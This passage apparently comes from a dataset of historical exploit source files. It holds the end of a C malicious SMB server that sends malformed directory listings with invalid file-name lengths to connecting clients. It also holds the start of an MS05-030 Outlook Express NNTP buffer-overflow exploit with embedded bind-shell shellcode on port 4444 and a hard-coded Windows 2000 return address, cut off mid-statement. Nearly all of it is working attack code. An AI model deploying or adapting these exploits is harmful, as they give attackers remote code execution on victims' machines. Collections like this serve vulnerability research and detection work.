ID: 0\n\n\"\\x0a\"                             // Word Count (WCT): 10\n\n\"\\x0a\\x00\"                         // Total Parameter Count: 10\n\n\"\\xc8\\x00\"                         // Total Data Count: 200\n\n\"\\x00\\x00\"                         // Reserved: 0000\n\n\"\\x0a\\x00\"                         // Parameter Count: 10\n\n\"\\x38\\x00\"                         // Parameter Offset: 56\n\n\"\\x00\\x00\"                         // Parameter Displacement: 0\n\n\"\\xc8\\x00\"                         // Data Count: 200\n\n\"\\x44\\x00\"                         // Data Offset: 68\n\n\"\\x00\\x00\"                         // Data Displacement: 0\n\n\"\\x00\"                             // Setup Count: 0\n\n\"\\x00\"                             // Reserved: 00\n\n\"\\xd5\\x00\"                         // Byte Count (BCC): 213\n\n\"\\x00\"                             // Padding: 00\n\n\"\\x01\\x08\"                         // Search ID: 0x0801\n\n\"\\x02\\x00\"                         // Seatch Count: 2\n\n\"\\x01\\x00\"                         // End of Search: 1\n\n\"\\x00\\x00\"                         // EA Error offset: 0\n\n\"\\x60\\x00\"                         // Last Name offset: 96\n\n\"\\x38\\x00\"                         // Padding: 3800\n\n\"\\x60\\x00\\x00\\x00\"                 // Next Entry offset: 96\n\n\"\\x00\\x00\\x00\\x00\"                 // File Index: 0\n\n\"\\xe8\\x35\\xcf\\x94\\x39\\x73\\xc5\\x01\" // Created: Jun 17, 2005 05:39:19.686500000\n\n\"\\xac\\x09\\x3c\\xae\\x39\\x73\\xc5\\x01\" // Last Access: Jun 17, 2005 05:40:02.342750000\n\n\"\\xe8\\x35\\xcf\\x94\\x39\\x73\\xc5\\x01\" // Last Write: Jun 17, 2005 05:39:19.686500000\n\n\"\\x9c\\x81\\x67\\x98\\x39\\x73\\xc5\\x01\" // Change:  Jun 17, 2005 05:39:25.717750000\n\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" // End of File: 0\n\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" // Allocation Size: 0\n\n\"\\x10\\x00\\x00\\x00\"                 // File Attributes: 0x00000010\n\n//\"\\x02\\x00\\x00\\x00\"               // File Name Len: 2\n\n\"\\xff\\xff\\xff\\xff\"                 // Bad File Name Len\n\n\"\\x00\\x00\\x00\\x00\"                 // EA List Length: 0\n\n//\"\\x00\"                           // Short File Name Len: 0\n\n\"\\xff\"                             // Bad Short File Name Len\n\n\"\\x00\"                             // Reserved: 00\n\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" // Short File Name:\n\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" // Short File Name:\n\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" // Short File Name:\n\n\"\\x2e\\x00\"                         // File Name: .\n\n\"\\x00\\x00\\x00\\x00\"                 // Next Entry Offset: 0\n\n\"\\x00\\x00\\x00\\x00\"                 // File Index: 0\n\n\"\\xe8\\x35\\xcf\\x94\\x39\\x73\\xc5\\x01\" // Created: Jun 17, 2005 05:39:19.686500000\n\n\"\\xac\\x09\\x3c\\xae\\x39\\x73\\xc5\\x01\" // Last Access: Jun 17, 2005 05:40:02.342750000\n\n\"\\xe8\\x35\\xcf\\x94\\x39\\x73\\xc5\\x01\" // Last Write: Jun 17, 2005 05:39:19.686500000\n\n\"\\x9c\\x81\\x67\\x98\\x39\\x73\\xc5\\x01\" // Change:  Jun 17, 2005 05:39:25.717750000\n\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" // End Of File: 0\n\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" // Allocation Size: 0\n\n\"\\x10\\x00\\x00\\x00\"                 // File Attributes: 0x00000010\n\n\"\\x04\\x00\\x00\\x00\"                 // File Name Len: 4\n\n\"\\x00\\x00\\x00\\x00\"                 // EA List Length: 0\n\n\"\\x00\"                             // Short File Name Len: 0\n\n\"\\x00\"                             // Reserved: 00\n\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" // Short File Name:\n\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" // Short File Name:\n\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" // Short File Name:\n\n\"\\x2e\\x00\\x2e\\x00\"                 // File Name: ..\n\n\"\\x00\\x00\\x00\\x00\\x00\\x00\";        // Unknown Data: 000000000000\n\n\n\nint\n\ncheck_interface ( char* str )\n\n{\n\n\tint i, j, wks = 0, srv = 0, spl = 0, wrg = 0, foo = 0;\n\n\n\n\t//Interface UUID\n\n\tunsigned char wks_uuid[] = \"\\x98\\xd0\\xff\\x6b\\x12\\xa1\\x10\\x36\\x98\\x33\\x46\\xc3\\xf8\\x7e\\x34\\x5a\";\n\n\tunsigned char srv_uuid[] = \"\\xc8\\x4f\\x32\\x4b\\x70\\x16\\xd3\\x01\\x12\\x78\\x5a\\x47\\xbf\\x6e\\xe1\\x88\";\n\n\tunsigned char spl_uuid[] = \"\\x78\\x56\\x34\\x12\\x34\\x12\\xcd\\xab\\xef\\x00\\x01\\x23\\x45\\x67\\x89\\xab\";\n\n\tunsigned char wrg_uuid[] = \"\\x01\\xd0\\x8c\\x33\\x44\\x22\\xf1\\x31\\xaa\\xaa\\x90\\x00\\x38\\x00\\x10\\x03\";\n\n\n\n\tfor ( i = 0; i < 16; i++ )\n\n\t{\n\n\t\tj = 0;\n\n\t\tif ( str[120 + i] < 0 )\n\n\t\t{\n\n\t\t\tif ( ( str[120 + i] + 0x100 ) == wks_uuid[i] )\n\n\t\t\t\t{ wks++; j = 1; }\n\n\t\t\tif ( ( str[120 + i] + 0x100 ) == srv_uuid[i] )\n\n\t\t\t\t{ srv++; j = 1; }\n\n\t\t\tif ( ( str[120 + i] + 0x100 ) == spl_uuid[i] )\n\n\t\t\t\t{ spl++; j = 1; }\n\n\t\t\tif ( ( str[120 + i] + 0x100 ) == wrg_uuid[i] )\n\n\t\t\t\t{ wrg++; j = 1; }\n\n\t\t\tif ( j == 0 )\n\n\t\t\t\tfoo++;\n\n\t\t}\n\n\t\telse\n\n\t\t{\n\n\t\t\tif ( str[120 + i] == wks_uuid[i] )\n\n\t\t\t\t{ wks++; j = 1; }\n\n\t\t\tif ( str[120 + i] == srv_uuid[i] )\n\n\t\t\t\t{ srv++; j = 1; }\n\n\t\t\tif ( str[120 + i] == spl_uuid[i] )\n\n\t\t\t\t{ spl++; j = 1; }\n\n\t\t\tif ( str[120 + i] == wrg_uuid[i] )\n\n\t\t\t\t{ wrg++; j = 1; }\n\n\t\t\tif ( j == 0 )\n\n\t\t\t\tfoo++;\n\n\t\t}\n\n\t}\n\n\tif ( wks == 16 )\n\n\t\treturn ( 0 );\n\n\telse if ( srv == 16 )\n\n\t\treturn ( 1 );\n\n\telse if ( spl == 16 )\n\n\t\treturn ( 2 );\n\n\telse if ( wrg == 16 )\n\n\t\treturn ( 3 );\n\n\telse\n\n\t{\n\n\t\tprintf ( \"there is/are %d invalid byte(s) in the interface UUID!\\n\", foo );\n\n\t\treturn ( -1 );\n\n\t}\n\n}\n\n\n\nvoid\n\nneg ( int s )\n\n{\n\n\tchar response[1024];\n\n\n\n\tbzero ( &response, sizeof ( response ) );\n\n\trecv ( s, response, sizeof ( response ) -1, 0 );\n\n\n\n\tsend ( s, SmbNeg, sizeof ( SmbNeg ) -1, 0 );\n\n}\n\n\n\nvoid\n\nsessionsetup ( int s, unsigned long userid, unsigned long treeid, int option )\n\n{\n\n\tchar response[1024];\n\n\tunsigned char ntlm_challenge1[] = \"\\xa2\\x75\\x1b\\x10\\xe7\\x62\\xb0\\xc3\";\n\n\tunsigned char ntlm_challenge2[] = \"\\xe1\\xed\\x43\\x66\\xc7\\xa7\\x36\\xbd\";\n\n\n\n\tbzero ( &response, sizeof ( response ) );\n\n\trecv ( s, response, sizeof ( response ) -1, 0 );\n\n\n\n\tprintf ( \"SessionSetupAndXNeg\\n\" );\n\n\tSessionSetupAndXNeg[30] = response[30];\n\n\tSessionSetupAndXNeg[31] = response[31];\n\n\tSessionSetupAndXNeg[34] = response[34];\n\n\tSessionSetupAndXNeg[35] = response[35];\n\n\n\n\tstrncpy ( SessionSetupAndXNeg + 32, ( unsigned char* ) &userid, 2 );\n\n\tif ( option == 0 )\n\n\t\tmemcpy ( SessionSetupAndXNeg + 71, ntlm_challenge1, 8 );\n\n\telse\n\n\t\tmemcpy ( SessionSetupAndXNeg + 71, ntlm_challenge2, 8 );\n\n\n\n\tsend ( s, SessionSetupAndXNeg, sizeof ( SessionSetupAndXNeg ) -1, 0 );\n\n\n\n\tbzero ( &response, sizeof ( response ) );\n\n\trecv ( s, response, sizeof ( response ) -1, 0 );\n\n\n\n\tprintf ( \"SessionSetupAndXAuth\\n\" );\n\n\tSessionSetupAndXAuth[30] = response[30];\n\n\tSessionSetupAndXAuth[31] = response[31];\n\n\tSessionSetupAndXAuth[34] = response[34];\n\n\tSessionSetupAndXAuth[35] = response[35];\n\n\n\n\tstrncpy ( SessionSetupAndXAuth + 32, ( unsigned char* ) &userid, 2 );\n\n\n\n\tsend ( s, SessionSetupAndXAuth, sizeof ( SessionSetupAndXAuth ) -1, 0 );\n\n\n\n\tbzero ( &response, sizeof ( response ) );\n\n\trecv ( s, response, sizeof ( response ) -1, 0 );\n\n\n\n\tprintf ( \"TreeConnectAndX\\n\" );\n\n\tTreeConnectAndX[30] = response[30];\n\n\tTreeConnectAndX[31] = response[31];\n\n\tTreeConnectAndX[34] = response[34];\n\n\tTreeConnectAndX[35] = response[35];\n\n\n\n\tstrncpy ( TreeConnectAndX + 28, ( unsigned char* ) &treeid, 2 );\n\n\tstrncpy ( TreeConnectAndX + 32, ( unsigned char* ) &userid, 2 );\n\n\n\n\tsend ( s, TreeConnectAndX, sizeof ( TreeConnectAndX ) -1, 0 );\n\n}\n\n\n\nvoid\n\ndigg ( int s, unsigned long fid, unsigned long assocgroup, unsigned long userid, unsigned long treeid, int option )\n\n{\n\n\tint ret;\n\n\tchar response[1024];\n\n\tunsigned char srv[] = \"\\x73\\x72\\x76\";\n\n\tunsigned char wks[] = \"\\x77\\x6b\\x73\";\n\n\n\n\tbzero ( &response, sizeof ( response ) );\n\n\trecv ( s, response, sizeof ( response ) -1, 0 );\n\n\n\n\tprintf ( \"SmbNtCreate\\n\" );\n\n\tSmbNtCreate[30] = response[30];\n\n\tSmbNtCreate[31] = response[31];\n\n\tSmbNtCreate[34] = response[34];\n\n\tSmbNtCreate[35] = response[35];\n\n\n\n\tstrncpy ( SmbNtCreate + 28, ( unsigned char* ) &treeid, 2 );\n\n\tstrncpy ( SmbNtCreate + 32, ( unsigned char* ) &userid, 2 );\n\n\tstrncpy ( SmbNtCreate + 42, ( unsigned char* ) &fid, 2 );\n\n\n\n\tsend ( s, SmbNtCreate, sizeof ( SmbNtCreate ) -1, 0 );\n\n\n\n\tbzero ( &response, sizeof ( response ) );\n\n\trecv ( s, response, sizeof ( response ) -1, 0 );\n\n\n\n\tprintf ( \"DceRpc\\n\" );\n\n\tDceRpc[30] = response[30];\n\n\tDceRpc[31] = response[31];\n\n\tDceRpc[34] = response[34];\n\n\tDceRpc[35] = response[35];\n\n\n\n\tstrncpy ( DceRpc + 28, ( unsigned char* ) &treeid, 2 );\n\n\tstrncpy ( DceRpc + 32, ( unsigned char* ) &userid, 2 );\n\n\tstrncpy ( DceRpc + 80, ( unsigned char* ) &assocgroup, 2 );\n\n\n\n\tret = check_interface ( response );\n\n\tif ( ret == 0 )\n\n\t\tmemcpy ( DceRpc + 92, wks, 3 );\n\n\telse if ( ret == 1 )\n\n\t\tmemcpy ( DceRpc + 92, srv, 3 );\n\n\telse if ( ret == 2 );\n\n\telse if ( ret == 3 );\n\n\telse\n\n\t{\n\n\t\tprintf ( \"invalid interface uuid, aborting...\\n\" );\n\n\t\texit ( 1 );\n\n\t}\n\n\n\n\tsend ( s, DceRpc, sizeof ( DceRpc ) -1, 0 );\n\n\n\n\tbzero ( &response, sizeof ( response ) );\n\n\trecv ( s, response, sizeof ( response ) -1, 0 );\n\n\n\n\tif ( option == 1 )\n\n\t{\n\n\t\tprintf ( \"NetrShareEnum\\n\" );\n\n\t\tNetrShareEnum[30] = response[30];\n\n\t\tNetrShareEnum[31] = response[31];\n\n\t\tNetrShareEnum[34] = response[34];\n\n\t\tNetrShareEnum[35] = response[35];\n\n\n\n\t\tstrncpy ( NetrShareEnum + 28, ( unsigned char* ) &treeid, 2 );\n\n\t\tstrncpy ( NetrShareEnum + 32, ( unsigned char* ) &userid, 2 );\n\n\n\n\t\tsend ( s, NetrShareEnum, sizeof ( NetrShareEnum ) -1, 0 );\n\n\t}\n\n\telse if ( ( option == 2 ) && ( ret == 2 ) )\n\n\t{\n\n\t\tprintf ( \"OpenPrinterEx\\n\" );\n\n\t\tOpenPrinterEx[30] = response[30];\n\n\t\tOpenPrinterEx[31] = response[31];\n\n\t\tOpenPrinterEx[34] = response[34];\n\n\t\tOpenPrinterEx[35] = response[35];\n\n\n\n\t\tstrncpy ( OpenPrinterEx + 28, ( unsigned char* ) &treeid, 2 );\n\n\t\tstrncpy ( OpenPrinterEx + 32, ( unsigned char* ) &userid, 2 );\n\n\n\n\t\tsend ( s, OpenPrinterEx, sizeof ( OpenPrinterEx ) -1, 0 );\n\n\n\n\t\tbzero ( &response, sizeof ( response ) );\n\n\t\trecv ( s, response, sizeof ( response ) -1, 0 );\n\n\n\n\t\tprintf ( \"ClosePrinter\\n\" );\n\n\t\tClosePrinter[30] = response[30];\n\n\t\tClosePrinter[31] = response[31];\n\n\t\tClosePrinter[34] = response[34];\n\n\t\tClosePrinter[35] = response[35];\n\n\n\n\t\tstrncpy ( ClosePrinter + 28, ( unsigned char* ) &treeid, 2 );\n\n\t\tstrncpy ( ClosePrinter + 32, ( unsigned char* ) &userid, 2 );\n\n\n\n\t\tsend ( s, ClosePrinter, sizeof ( ClosePrinter ) -1, 0 );\n\n\t}\n\n\telse if ( ( option == 3 ) && ( ret == 3 ) )\n\n\t{\n\n\t\tprintf ( \"OpenHklm\\n\" );\n\n\t\tOpenHklm[30] = response[30];\n\n\t\tOpenHklm[31] = response[31];\n\n\t\tOpenHklm[34] = response[34];\n\n\t\tOpenHklm[35] = response[35];\n\n\n\n\t\tstrncpy ( OpenHklm + 28, ( unsigned char* ) &treeid, 2 );\n\n\t\tstrncpy ( OpenHklm + 32, ( unsigned char* ) &userid, 2 );\n\n\n\n\t\tsend ( s, OpenHklm, sizeof ( OpenHklm ) -1, 0 );\n\n\n\n\t\tbzero ( &response, sizeof ( response ) );\n\n\t\trecv ( s, response, sizeof ( response ) -1, 0 );\n\n\n\n\t\tprintf ( \"OpenKey\\n\" );\n\n\t\tOpenKey[30] = response[30];\n\n\t\tOpenKey[31] = response[31];\n\n\t\tOpenKey[34] = response[34];\n\n\t\tOpenKey[35] = response[35];\n\n\n\n\t\tstrncpy ( OpenKey + 28, ( unsigned char* ) &treeid, 2 );\n\n\t\tstrncpy ( OpenKey + 32, ( unsigned char* ) &userid, 2 );\n\n\n\n\t\tsend ( s, OpenKey, sizeof ( OpenKey ) -1, 0 );\n\n\n\n\t\tbzero ( &response, sizeof ( response ) );\n\n\t\trecv ( s, response, sizeof ( response ) -1, 0 );\n\n\n\n\t\tprintf ( \"CloseKey\\n\" );\n\n\t\tCloseKey[30] = response[30];\n\n\t\tCloseKey[31] = response[31];\n\n\t\tCloseKey[34] = response[34];\n\n\t\tCloseKey[35] = response[35];\n\n\n\n\t\tstrncpy ( CloseKey + 28, ( unsigned char* ) &treeid, 2 );\n\n\t\tstrncpy ( CloseKey + 32, ( unsigned char* ) &userid, 2 );\n\n\n\n\t\tsend ( s, CloseKey, sizeof ( CloseKey ) -1, 0 );\n\n\t}\n\n\telse if ( option == 4 )\n\n\t{\n\n\t\tprintf ( \"NetBios1\\n\" );\n\n\t\tNetBios1[30] = response[30];\n\n\t\tNetBios1[31] = response[31];\n\n\t\tNetBios1[34] = response[34];\n\n\t\tNetBios1[35] = response[35];\n\n\n\n\t\tstrncpy ( NetBios1 + 28, ( unsigned char* ) &treeid, 2 );\n\n\t\tstrncpy ( NetBios1 + 32, ( unsigned char* ) &userid, 2 );\n\n\n\n\t\tsend ( s, NetBios1, sizeof ( NetBios1 ) -1, 0 );\n\n\t}\n\n\telse\n\n\t{\n\n\t\tif ( ret == 0 )\n\n\t\t{\n\n\t\t\tprintf ( \"WksSvc\\n\" );\n\n\t\t\tWksSvc[30] = response[30];\n\n\t\t\tWksSvc[31] = response[31];\n\n\t\t\tWksSvc[34] = response[34];\n\n\t\t\tWksSvc[35] = response[35];\n\n\n\n\t\t\tstrncpy ( WksSvc + 28, ( unsigned char* ) &treeid, 2 );\n\n\t\t\tstrncpy ( WksSvc + 32, ( unsigned char* ) &userid, 2 );\n\n\n\n\t\t\tsend ( s, WksSvc, sizeof ( WksSvc ) -1, 0 );\n\n\t\t}\n\n\t\telse\n\n\t\t{\n\n\t\t\tprintf ( \"SrvSvc\\n\" );\n\n\t\t\tSrvSvc[30] = response[30];\n\n\t\t\tSrvSvc[31] = response[31];\n\n\t\t\tSrvSvc[34] = response[34];\n\n\t\t\tSrvSvc[35] = response[35];\n\n\n\n\t\t\tstrncpy ( SrvSvc + 28, ( unsigned char* ) &treeid, 2 );\n\n\t\t\tstrncpy ( SrvSvc + 32, ( unsigned char* ) &userid, 2 );\n\n\n\n\t\t\tsend ( s, SrvSvc, sizeof ( SrvSvc ) -1, 0 );\n\n\t\t}\n\n\t}\n\n\n\n\tbzero ( &response, sizeof ( response ) );\n\n\trecv ( s, response, sizeof ( response ) -1, 0 );\n\n\n\n\tprintf ( \"SmbClose\\n\" );\n\n\tSmbClose[30] = response[30];\n\n\tSmbClose[31] = response[31];\n\n\tSmbClose[34] = response[34];\n\n\tSmbClose[35] = response[35];\n\n\n\n\tstrncpy ( SmbClose + 28, ( unsigned char* ) &treeid, 2 );\n\n\tstrncpy ( SmbClose + 32, ( unsigned char* ) &userid, 2 );\n\n\n\n\tsend ( s, SmbClose, sizeof ( SmbClose ) -1, 0 );\n\n}\n\n\n\nvoid\n\nexploit ( int s, unsigned long fid, unsigned long assocgroup, unsigned long userid, unsigned long treeid )\n\n{\n\n\tchar response[1024];\n\n\n\n\tbzero ( &response, sizeof ( response ) );\n\n\trecv ( s, response, sizeof ( response ) -1, 0 );\n\n\n\n\tprintf ( \"NetBios2\\n\" );\n\n\tNetBios2[30] = response[30];\n\n\tNetBios2[31] = response[31];\n\n\tNetBios2[34] = response[34];\n\n\tNetBios2[35] = response[35];\n\n\n\n\tstrncpy ( NetBios2 + 28, ( unsigned char* ) &treeid, 2 );\n\n\tstrncpy ( NetBios2 + 32, ( unsigned char* ) &userid, 2 );\n\n\n\n\tsend ( s, NetBios2, sizeof ( NetBios2 ) -1, 0 );\n\n\n\n\tbzero ( &response, sizeof ( response ) );\n\n\trecv ( s, response, sizeof ( response ) -1, 0 );\n\n\n\n\tprintf ( \"Trans2Response1\\n\" );\n\n\tTrans2Response1[30] = response[30];\n\n\tTrans2Response1[31] = response[31];\n\n\tTrans2Response1[34] = response[34];\n\n\tTrans2Response1[35] = response[35];\n\n\n\n\tstrncpy ( Trans2Response1 + 28, ( unsigned char* ) &treeid, 2 );\n\n\tstrncpy ( Trans2Response1 + 32, ( unsigned char* ) &userid, 2 );\n\n\n\n\tsend ( s, Trans2Response1, sizeof ( Trans2Response1 ) -1, 0 );\n\n\n\n\tbzero ( &response, sizeof ( response ) );\n\n\trecv ( s, response, sizeof ( response ) -1, 0 );\n\n\n\n\tprintf ( \"Trans2Response2\\n\" );\n\n\tTrans2Response2[30] = response[30];\n\n\tTrans2Response2[31] = response[31];\n\n\tTrans2Response2[34] = response[34];\n\n\tTrans2Response2[35] = response[35];\n\n\n\n\tstrncpy ( Trans2Response2 + 28, ( unsigned char* ) &treeid, 2 );\n\n\tstrncpy ( Trans2Response2 + 32, ( unsigned char* ) &userid, 2 );\n\n\n\n\tsend ( s, Trans2Response2, sizeof ( Trans2Response2 ) -1, 0 );\n\n\n\n\tbzero ( &response, sizeof ( response ) );\n\n\trecv ( s, response, sizeof ( response ) -1, 0 );\n\n\n\n\tprintf ( \"Trans2Response3\\n\" );\n\n\tTrans2Response3[30] = response[30];\n\n\tTrans2Response3[31] = response[31];\n\n\tTrans2Response3[34] = response[34];\n\n\tTrans2Response3[35] = response[35];\n\n\n\n\tstrncpy ( Trans2Response3 + 28, ( unsigned char* ) &treeid, 2 );\n\n\tstrncpy ( Trans2Response3 + 32, ( unsigned char* ) &userid, 2 );\n\n\n\n\tsend ( s, Trans2Response3, sizeof ( Trans2Response3 ) -1, 0 );\n\n}\n\n\n\nint\n\nmain ( int argc, char* argv[] )\n\n{\n\n\tint s1, s2, i;\n\n\tunsigned long fid = 0x1337;\n\n\tunsigned long treeid = 0x0808;\n\n\tunsigned long userid = 0x0808;\n\n\tunsigned long assocgroup = 0x4756;\n\n\tpid_t childpid;\n\n\tsocklen_t clilen;\n\n\tstruct sockaddr_in cliaddr, servaddr;\n\n\n\n\tbzero ( &servaddr, sizeof ( servaddr ) );\n\n\tservaddr.sin_family = AF_INET;\n\n\tservaddr.sin_addr.s_addr = htonl ( INADDR_ANY );\n\n\tservaddr.sin_port = htons ( PORT );\n\n\n\n\ts1 = socket ( AF_INET, SOCK_STREAM, 0 );\n\n\tbind ( s1, ( struct sockaddr * ) &servaddr, sizeof ( servaddr ) );\n\n\tlisten ( s1, 1 );\n\n\n\n\tclilen = sizeof ( cliaddr );\n\n\n\n\ts2 = accept ( s1, ( struct sockaddr * ) &cliaddr, &clilen );\n\n\n\n\tclose ( s1 );\n\n\n\n\tprintf ( \"\\n%s\\n\\n\", inet_ntoa ( cliaddr.sin_addr ) );\n\n\n\n\tneg ( s2 );                                             // Negotiate\n\n\tsessionsetup ( s2, userid, treeid, 0 );                 // SessionSetup\n\n\tfor ( i = 0; i < 15; i++ )\n\n\t{\n\n\t\tdigg ( s2, fid, assocgroup, userid, treeid, 0 );\n\n\t\tfid++;\n\n\t\tassocgroup ++;\n\n\t}\n\n\tdigg ( s2, fid, assocgroup, userid, treeid, 1 );        // NetrShareEnum\n\n\tfid++;\n\n\tassocgroup ++;\n\n\tdigg ( s2, fid, assocgroup, userid, treeid, 2 );        // spoolss\n\n\tfid++;\n\n\tassocgroup ++;\n\n\tfor ( i = 0; i < 4; i++ )\n\n\t{\n\n\t\tdigg ( s2, fid, assocgroup, userid, treeid, 0 );\n\n\t\tfid++;\n\n\t\tassocgroup ++;\n\n\t}\n\n\tdigg ( s2, fid, assocgroup, userid, treeid, 3 );         // WinReg\n\n\tuserid++;\n\n\ttreeid++;\n\n\tsessionsetup ( s2, userid, treeid, 1 );                  // SessionSetup\n\n\tuserid--;\n\n\ttreeid--;\n\n\tfor ( i = 0; i < 2; i++ )\n\n\t{\n\n\t\tdigg ( s2, fid, assocgroup, userid, treeid, 4 );     // NetBios\n\n\t\tfid++;\n\n\t\tassocgroup ++;\n\n\t}\n\n\ttreeid += 2;\n\n\texploit ( s2, fid, assocgroup, userid, treeid );\n\n\n\n\tprintf ( \"done!\\n\" );\n\n\n\n\tclose ( s2 );\n\n}\n\n\n\n// milw0rm.com [2005-06-23]",
360        "vulnerable": true
361    },
362    {
363        "exploit_id": 1066,
364        "content": "#include <winsock2.h>\n\n#include <windows.h>\n\n#include <stdio.h>\n\n#include <stdlib.h>\n\n#pragma comment(lib,\"ws2_32\")\n\n\n\n/* win32_bind - EXITFUNC=process LPORT=4444 Size=344 \n\nEncoder=PexFnstenvSub http://metasploit.com */\n\nunsigned char scode[] =\n\n\"\\x31\\xc9\\x83\\xe9\\xb0\\xd9\\xee\\xd9\\x74\\x24\\xf4\\x5b\\x81\\x73\\x13\\x96\"\n\n\"\\x27\\xc8\\x3e\\x83\\xeb\\xfc\\xe2\\xf4\\x6a\\x4d\\x23\\x73\\x7e\\xde\\x37\\xc1\"\n\n\"\\x69\\x47\\x43\\x52\\xb2\\x03\\x43\\x7b\\xaa\\xac\\xb4\\x3b\\xee\\x26\\x27\\xb5\"\n\n\"\\xd9\\x3f\\x43\\x61\\xb6\\x26\\x23\\x77\\x1d\\x13\\x43\\x3f\\x78\\x16\\x08\\xa7\"\n\n\"\\x3a\\xa3\\x08\\x4a\\x91\\xe6\\x02\\x33\\x97\\xe5\\x23\\xca\\xad\\x73\\xec\\x16\"\n\n\"\\xe3\\xc2\\x43\\x61\\xb2\\x26\\x23\\x58\\x1d\\x2b\\x83\\xb5\\xc9\\x3b\\xc9\\xd5\"\n\n\"\\x95\\x0b\\x43\\xb7\\xfa\\x03\\xd4\\x5f\\x55\\x16\\x13\\x5a\\x1d\\x64\\xf8\\xb5\"\n\n\"\\xd6\\x2b\\x43\\x4e\\x8a\\x8a\\x43\\x7e\\x9e\\x79\\xa0\\xb0\\xd8\\x29\\x24\\x6e\"\n\n\"\\x69\\xf1\\xae\\x6d\\xf0\\x4f\\xfb\\x0c\\xfe\\x50\\xbb\\x0c\\xc9\\x73\\x37\\xee\"\n\n\"\\xfe\\xec\\x25\\xc2\\xad\\x77\\x37\\xe8\\xc9\\xae\\x2d\\x58\\x17\\xca\\xc0\\x3c\"\n\n\"\\xc3\\x4d\\xca\\xc1\\x46\\x4f\\x11\\x37\\x63\\x8a\\x9f\\xc1\\x40\\x74\\x9b\\x6d\"\n\n\"\\xc5\\x74\\x8b\\x6d\\xd5\\x74\\x37\\xee\\xf0\\x4f\\xd9\\x62\\xf0\\x74\\x41\\xdf\"\n\n\"\\x03\\x4f\\x6c\\x24\\xe6\\xe0\\x9f\\xc1\\x40\\x4d\\xd8\\x6f\\xc3\\xd8\\x18\\x56\"\n\n\"\\x32\\x8a\\xe6\\xd7\\xc1\\xd8\\x1e\\x6d\\xc3\\xd8\\x18\\x56\\x73\\x6e\\x4e\\x77\"\n\n\"\\xc1\\xd8\\x1e\\x6e\\xc2\\x73\\x9d\\xc1\\x46\\xb4\\xa0\\xd9\\xef\\xe1\\xb1\\x69\"\n\n\"\\x69\\xf1\\x9d\\xc1\\x46\\x41\\xa2\\x5a\\xf0\\x4f\\xab\\x53\\x1f\\xc2\\xa2\\x6e\"\n\n\"\\xcf\\x0e\\x04\\xb7\\x71\\x4d\\x8c\\xb7\\x74\\x16\\x08\\xcd\\x3c\\xd9\\x8a\\x13\"\n\n\"\\x68\\x65\\xe4\\xad\\x1b\\x5d\\xf0\\x95\\x3d\\x8c\\xa0\\x4c\\x68\\x94\\xde\\xc1\"\n\n\"\\xe3\\x63\\x37\\xe8\\xcd\\x70\\x9a\\x6f\\xc7\\x76\\xa2\\x3f\\xc7\\x76\\x9d\\x6f\"\n\n\"\\x69\\xf7\\xa0\\x93\\x4f\\x22\\x06\\x6d\\x69\\xf1\\xa2\\xc1\\x69\\x10\\x37\\xee\"\n\n\"\\x1d\\x70\\x34\\xbd\\x52\\x43\\x37\\xe8\\xc4\\xd8\\x18\\x56\\xe8\\xff\\x2a\\x4d\"\n\n\"\\xc5\\xd8\\x1e\\xc1\\x46\\x27\\xc8\\x3e\";\n\n\n\nstruct\n\n{\n\nDWORD dwJMPEBX;\n\nchar *szDescription;\n\n}targets[] = \n\n{\n\n{0x7803382b, \"win2k sp4 all language\"}\n\n},v;\n\n\n\nvoid usage(char *p)\n\n{\n\nint i;\n\nprintf( \"Usage: %s <type>\\n\"\n\n\"[type]\\n\", p);\n\nfor(i=0;i<sizeof(targets)/sizeof(v);i++)\n\n{\n\nprintf(\"%d\\t%s\\n\", i, targets[i].szDescription);\n\n}\n\n}\n\n\n\nvoid main(int argc, char **argv)\n\n{\n\nstruct sockaddr_in server,client;\n\nWSADATA wsd;\n\nSOCKET s2,s3;\n\nint ret;\n\nchar szRecvBuff[0x100];\n\nchar szSend[] = \"200\\r\\n\";\n\nint i,iType;\n\nchar szEvil[0x3000], szTmp[0x10];\n\n\n\nprintf( \"MS OE NNTP \\\"LIST\\\" Buffer Overflow (MS05-030) EXP\\n\"\n\n\"Credits: Bug found by iDEFENSE\\n\"\n\n\"coded by eyas < eyas at xfocus.org>\\n\"\n\n\"http://www.xfocus.net\\n\\n\");\n\n\n\nif(argc!=2)\n\n{\n\nusage(argv[0]);\n\nreturn;\n\n}\n\n\n\niType = atoi(argv[1]);\n\n\n\n\n\nif (WSAStartup(MAKEWORD(1,1), &wsd) != 0)\n\n{\n\nprintf(\"[-] WSAStartup error:%d\\n\", WSAGetLastError());\n\nreturn;\n\n}\n\ns2 = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);\n\nserver.sin_family = AF_INET;\n\nserver.sin_port = htons(119);\n\nserver.sin_addr.s_addr= 0;\n\nret = bind(s2, (struct sockaddr *)&server, sizeof(server));\n\nret = listen(s2, 100);\n\nprintf(\"[+] Listen on TCP 119.\\n\");\n\nwhile(1)\n\n{\n\nret=sizeof(client);\n\ns3 = accept(s2, (struct sockaddr *)&client, &ret);\n\nprintf(\"[+] Connection accepted from %s:%d\\n\", \n\ninet_ntoa(client.sin_addr), ntohs(client.sin_port));\n\n\n\nprintf(\"[+] Send welcome information.\\n\");\n\nsend(s3, szSend, strlen(szSend), 0);\n\n\n\nret = recv(s3, szRecvBuff, sizeof(szRecvBuff), 0);\n\nszRecvBuff[ret-1] = '\\x0';\n\nprintf(\"[+] Recv: [%s]\\n\", szRecvBuff);\n\nsend(s3, szSend, strlen(szSend), 0);\n\nprintf(\"[+] Send response.\\n\");\n\n\n\nret = recv(s3, szRecvBuff, sizeof(szRecvBuff), 0);\n\nszRecvBuff[ret-4] = '\\x0';\n\nprintf(\"[+] Recv: [%s]\\n\", szRecvBuff);\n\nprintf(\"[+] send evil buff.\\n\");\n\n\n\nstrcpy(szTmp, 